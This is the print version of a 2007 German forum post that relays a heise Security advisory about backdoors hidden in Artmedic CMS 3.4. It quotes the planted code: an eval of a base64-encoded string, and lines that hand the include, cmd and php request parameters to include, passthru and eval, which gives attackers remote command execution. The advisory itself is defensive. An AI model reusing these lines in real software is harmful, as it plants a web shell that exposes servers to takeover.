Hintertür in Artmedic CMS - Druckversion +- ok-webhosting Forum (https://forum.ok-webhosting.de) +-- Forum: Allgemein (https://forum.ok-webhosting.de/forumdisplay.php?fid=3) +--- Forum: Security (https://forum.ok-webhosting.de/forumdisplay.php?fid=10) +--- Thema: Hintertür in Artmedic CMS (/showthread.php?tid=241) |
Hintertür in Artmedic CMS - ok-webhosting - 19.05.2007 Im Code des Content Management Systems Artmedic sind mehrere Hintertüren versteckt, über die ein Angreifer den Server komprimitieren und komplett übernehmen kann. Darüber hinaus versendet das Setup-Skript eine E-Mail mit dem Namen des unterminierten Servers an eine Adresse in Russland. An mindestens drei Stellen enthält der PHP-Code des CMS offenbar nachträglich eingefügte Statements der Form: $template1 = 'aWYoJF9HR...'; eval(base64_decode($template1)); Das entpackt die kryptische, base64-kodierte Zeichenkette zunächst und führt die so erhaltenen Befehle dann via eval aus. if($_GET['include']) include($_GET['include']); if($_GET['cmd']) passthru($_GET['cmd']); if($_GET['php']) eval($_GET['php']); Dieser PHP-Code wertet die GET-Parameter include, cmd und php aus. Damit kann ein Angreifer durch den Aufruf spezieller URLs eigenen Code einschleusen und beliebige Befehle auf dem Server starten. Die fraglichen Dateien sind zumindest in der aktuell zum Download angebotenen Version 3.4 enthalten und tragen ein Datum vom 2. Mai, das jedoch auch manipuliert sein könnte. Die Anbieter von Artmedic haben bislang auf Nachfragen von heise Security nicht geantwortet. Wer eine Site mit Artmedic betreibt, sollte diese sofort offline nehmen und den Server genauestens auf Hinterlassenschaften unerwünschter Besucher untersuchen. Quelle: heise.de [/b] |